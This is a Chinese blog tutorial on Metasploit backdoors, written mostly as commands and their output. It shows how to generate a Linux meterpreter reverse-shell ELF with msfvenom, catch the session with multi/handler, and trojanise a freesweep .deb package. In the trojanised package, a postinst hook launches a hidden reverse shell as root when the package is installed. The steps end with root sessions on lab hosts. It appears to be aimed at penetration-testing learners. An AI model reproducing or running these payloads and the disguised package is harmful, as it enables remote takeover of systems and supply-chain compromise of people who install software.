Metasploit后门攻击实例(五)

2022年10月25日10:40:53 发表评论 139 views

1.1 后门攻击实例

1.1.1 制作Linux后门获取shell

1.1.1.1 制作Linux木马

# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

1.1.1.2 kali启动监听程序

msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

1.1.1.3 Linux(centos)执行木马

[root@test ~]# wget http://192.168.10.180/backdoor
[root@test ~]# chmod +x backdoor
[root@test ~]# nohup ./backdoor &

1.1.1.4 后门连接成功后执行攻击指令

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.10.80
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  13893  fil   2022-06-01 16:01:33 +0800  .bash_history
100644/rw-r--r--  18     fil   2013-12-29 10:26:31 +0800  .bash_logout
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bash_profile
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bashrc
100644/rw-r--r--  100    fil   2013-12-29 10:26:31 +0800  .cshrc
040755/rwxr-xr-x  37     dir   2021-12-14 10:44:29 +0800  .java
100600/rw-------  349    fil   2021-12-17 14:11:10 +0800  .mysql_history
040740/rwxr-----  19     dir   2021-11-16 10:41:42 +0800  .pki
040700/rwx------  25     dir   2021-12-14 13:23:17 +0800  .ssh
100644/rw-r--r--  129    fil   2013-12-29 10:26:31 +0800  .tcshrc
100600/rw-------  6982   fil   2022-05-12 10:36:28 +0800  .viminfo
100600/rw-------  1434   fil   2021-05-21 14:07:28 +0800  anaconda-ks.cfg
100755/rwxr-xr-x  295    fil   2022-06-07 17:05:55 +0800  backdoor
100644/rw-r--r--  27647  fil   2022-06-01 10:47:00 +0800  dnmap-0.6.zip
040755/rwxr-xr-x  199    dir   2022-06-01 15:02:43 +0800  dnmap-master
100644/rw-r--r--  23761  fil   2022-01-13 13:28:05 +0800  history.log

1.1.2 给deb软件注入后门进行攻击

1.1.2.1 制作恶意deb软件包

  • 下载解压deb软件

# apt install freesweep --download-only
# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./
# dpkg -x freesweep_1.0.2-1_amd64.deb free

  • 生成后门文件

# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources

  • 创建打包deb的配置文件

# mkdir -p /root/free/DEBIAN
# cd /root/free/DEBIAN

# cat >> /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text- based terminals currently in use.
EOF

# cat >> /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

# chmod 755 /root/free/DEBIAN/postinst

  • 重新打包deb文件

# dpkg-deb --build /root/free/
# ll -h free.deb
-rw-r--r-- 1 root root 55K Jun  8 08:54 free.deb
# 若报错:dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz  , giving up
# 则使用此命令打包:dpkg-deb -Z gzip --build ./free free.deb
# mv free.deb /var/www/html
# systemctl start apache2.service

1.1.2.2 开启msf监听

# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit –j

1.1.2.3 客户端安装deb

msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb
msfadmin@metasploitable:~$ sudo dpkg -i free.deb

1.1.2.4 查看连接情况并获取服务器信息

msf6 exploit(multi/handler) > sessions

Metasploit后门攻击实例(五)
msf6 exploit(multi/handler) > sessions -i 5
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
background

Background session 5? [y/N]  y

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang